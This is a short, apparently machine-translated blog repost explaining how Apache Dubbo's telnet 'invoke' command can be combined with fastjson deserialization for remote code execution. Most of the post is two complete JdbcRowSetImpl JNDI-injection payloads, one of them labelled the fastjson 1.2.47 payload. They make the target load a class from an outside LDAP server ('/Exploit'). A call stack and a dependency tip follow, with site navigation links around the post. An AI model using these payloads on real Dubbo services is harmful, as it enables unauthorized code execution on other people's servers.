Dubbo calls fastjson - Code World

Dubbo calls fastjson

Others 2020-10-14 20:57:07 views: null

Fastjson is used by default for parsing strings, which can be combined with fastjson to implement RCE.

invoke ({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.85.1:8089/test_by_cqq", "autoCommit": true })

Call the invoke command and then (), fill in the json format of {} in the middle.

If fastjson exists, the 1.2.47 payload is used:

invoke ({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://333.e9f7d0ac5032df304f03.d.zhack.ca:1389/Exploit", "autoCommit": true } })

The call stack is:

telnet:81, InvokeTelnetHandler (org.apache.dubbo.qos.legacy)
telnet:59, TelnetHandlerAdapter (org.apache.dubbo.remoting.telnet.support)
received:187, HeaderExchangeHandler (org.apache.dubbo.remoting.exchange.support.header)
received:51, DecodeHandler (org.apache.dubbo.remoting.transport)
run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher)
runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
run:748, Thread (java.lang)

Insert picture description here
The following is the calling process of fastjson's JSON.parseArray method.

If it appears:

Invalid json argument, cause: com/alibaba/fastjson/JSON

Indicates that pom needs to add fastjson dependency.

reference

The security risks of Dubbo service's externally exposed ports (part 1)

Guess you like

Origin blog.csdn.net/caiqiiqi/article/details/107183574

Dubbo calls fastjson

Dubbo safety calls

Dubbo calls the proxy class asynchronously

Apache Dubbo asynchronous calls and asynchronous execution

dubbo Interface Public class service calls

How to design idempotent for Dubbo distributed interface calls

Got tricked by fastjson again? It calls my custom get method!

Dubbo -- do not use strong dependencies on api interface calls

Ajax cross-domain and remote calls, Dubbo applications

FastJson

dubbo calls the external network interface to register the external network ip to zookeeper to expose the external network ip

[SpringBoot integrates Nacos+Dubbo] Enterprise-level projects integrate microservice components to realize RPC remote calls

dubbo

fastJson Tutorial

Of a BUG Fastjson

The scala fastjson

Introduction to Fastjson

RPC calls and HTTP calls

Dubbo (a): Dubbo operating principle

Dubbo (two) Dubbo basics

Dubbo (a) Dubbo Introduction

Module calls

And calls this function

[FastJson] FastJson parsing serializer error/deserializer error

fastjson vulnerability - Fastjson1.2.47 deserialization vulnerability

Fastjson processing data with json

Alibaba fastjson of jsontools

FastJSON use examples

JSON parsing of FastJson

Jackson, gson, fastjson

Recommended

Ranking

ASP.NET Core storage session to get any value

Linux has disk space but shows insufficient inode usage in Linux

Oral English 433 Twenty English Words Every Day

The use of common transforms in Pytorch

It's Graduation Season II again

Introduction to OracleDB 6: Use DB LINK to clone non-CDB into CDB architecture

How the report generator FastReport .Net uses code to create reports

My Live Writer Plugin - insert monkey face

DCM's diagnostic services dispatcher (DSD) a Detailed

Java NullPointerException when using scanner.hasNext();

Daily

More

2024-05-23(35)

2024-05-22(9)

2024-05-21(35)

2024-05-20(5)

2024-05-19(0)

2024-05-18(31)

2024-05-17(6)

2024-05-16(23)

2024-05-15(5)

2024-05-14(9)